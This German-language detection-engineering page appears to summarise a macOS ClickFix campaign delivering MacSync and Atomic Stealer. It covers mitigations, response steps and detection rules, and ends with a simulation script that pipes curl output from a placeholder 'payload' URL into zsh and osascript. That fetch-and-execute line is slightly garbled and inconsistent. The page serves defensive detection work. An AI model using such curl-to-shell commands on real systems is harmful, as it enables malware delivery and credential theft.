macOS ClickFix-Kampagne entwickelt sich mit getarnten Infektions-Gates weiter
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Eine macOS ClickFix-Kampagne verbreitet Informationsdiebe, darunter MacSync und Atomic Stealer (AMOS), durch ein ausgeklügeltes serverseitiges Fingerprinting-Gate. Die Operation verwendet algorithmisch generierte Domains und Browser-Fingerprinting, um sicherzustellen, dass bösartige Nutzlasten nur an echte macOS-Benutzer geliefert werden, wodurch automatisierte Sicherheitsanalysen und Crawler umgangen werden. Diese Entwicklung markiert einen Wandel von breiten Social-Engineering-Methoden hin zu hochgradig zielgerichteten und verdeckten Lieferungstechniken.
Untersuchung
Microsoft Threat Intelligence verfolgte einen Cluster von mehr als 250 Domains mit einem charakteristischen Namensmuster, um die Kampagne aufzudecken. Die Untersuchung ergab einen Übergang von der direkten Köderlieferung zu einem zweistufigen Prozess mit leichtgewichtigem JavaScript-Profiling. Durch die Auswertung von WebGL-Signalen, Zeitzonenabweichungen und Anti-Analyse-Überprüfungen ermittelten Forscher, wie die Infrastruktur gezielt macOS-Umgebungen anvisiert, während sie nicht qualifizierten Anfragen harmlose Scheininhalte präsentiert.
Minderungsmaßnahme
Organisationen sollten Benutzer darüber aufklären, dass legitime Software-Updates nicht das Einfügen von Befehlen in das Terminal erfordern. Sicherheitsteams sollten auf verdächtige Terminalaktivitäten achten, die Dienstprogramme wie curl, base64, gunzip, oder osascript, insbesondere wenn sie nach dem Surfen im Internet ausgelöst werden. Die Stärkung des Schutzes rund um Keychain-Daten und die Überwachung auf unbefugtes Archivieren sensibler Dateien kann ebenfalls die Auswirkungen eines erfolgreichen Angriffs verringern.
Reaktion
Wenn verdächtige Terminalausführungen oder unbefugter Zugriff auf Anmeldeinformationsspeicher erkannt werden, sollten die Responder den betroffenen macOS-Endpunkt sofort isolieren. Ausgehende Verbindungen zu Domains mit niedrigem Ruf sollten untersucht werden, mit besonderem Augenmerk auf /curl/ Anforderungsmuster. Identifizierte bösartige Bereitstellungshosts sollten blockiert und der jüngste Shell-Verlauf auf codierte oder verschleierte Befehlsausführung überprüft werden.
Angriffsfluss
Erkennungen
Verdächtiger Curl-Ausführungsversuch [MacOS] (via cmdline)
Proof of Value
Verdächtige Command and Control durch ungewöhnliche Top-Level-Domain (TLD) DNS-Anfrage (via dns)
Proof of Value
Mögliche Base64-kodierte String-Manipulation [MacOS] (via cmdline)
Proof of Value
Erkennen ausgehender Verbindungen zu verdächtigen Domains und unerwartete Geografie/Browsing [Firewall]
Proof of Value
Bösartige macOS-Terminalbefehlsausführung über ClickFix-Kampagne [Linux-Prozess-Erstellung]
Proof of Value
Simulationsausführung
Voraussetzung: Die Telemetry & Baseline Pre-flight Check muss bestanden haben.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der gegnerischen Technik (TTP), die entwickelt wurde, um die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, genau die Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird. Abstrakte oder unzusammenhängende Beispiele führen zu Fehldiagnosen.
-
Angriffserzählung & Befehle: Der Angreifer startet eine ClickFix-Kampagne, indem er eine gefälschte Fehlermeldung in einem Webbrowser präsentiert, die den Benutzer anweist, den Fehler zu beheben, indem er einen bestimmten Befehl in das Terminal einfügt. Das Ziel des Angreifers ist es, Persistenz herzustellen oder Malware herunterzuladen. Der Befehl verwendet
curlum eine bösartige AppleScript-Nutzlast von einem Remote-Server abzurufen und sie inosascript -ezu pipen, um sie sofort im Speicher auszuführen und so das herkömmliche filebasierte Scannen zu umgehen. -
Regressionstest-Skript:
# Simulation von ClickFix: Abrufen einer Nutzlast und Ausführung über osascript # Hinweis: Wir verwenden einen harmlosen echo-Befehl, um die Remote-Nutzlast zu simulieren, um eine tatsächliche Infektion zu vermeiden. curl -s https://raw.githubusercontent.com/example/payload/main/script.sh | zsh -c 'osascript -e "display dialog "Sicherheitswarnung: Systemaktualisierung erforderlich""' # Um sicherzustellen, dass die Erkennungsregel auslöst, führen wir das genaue Muster aus: osascript -e 'say "Dies ist ein simuliertes Angriff"' -
Bereinigungskommandos:
# Es werden keine Dateien auf die Festplatte geschrieben, bei dieser speziellen Befehlszeilenausführung, # aber wir stellen sicher, dass alle Hintergrundprozesse beendet werden. killall osascript || true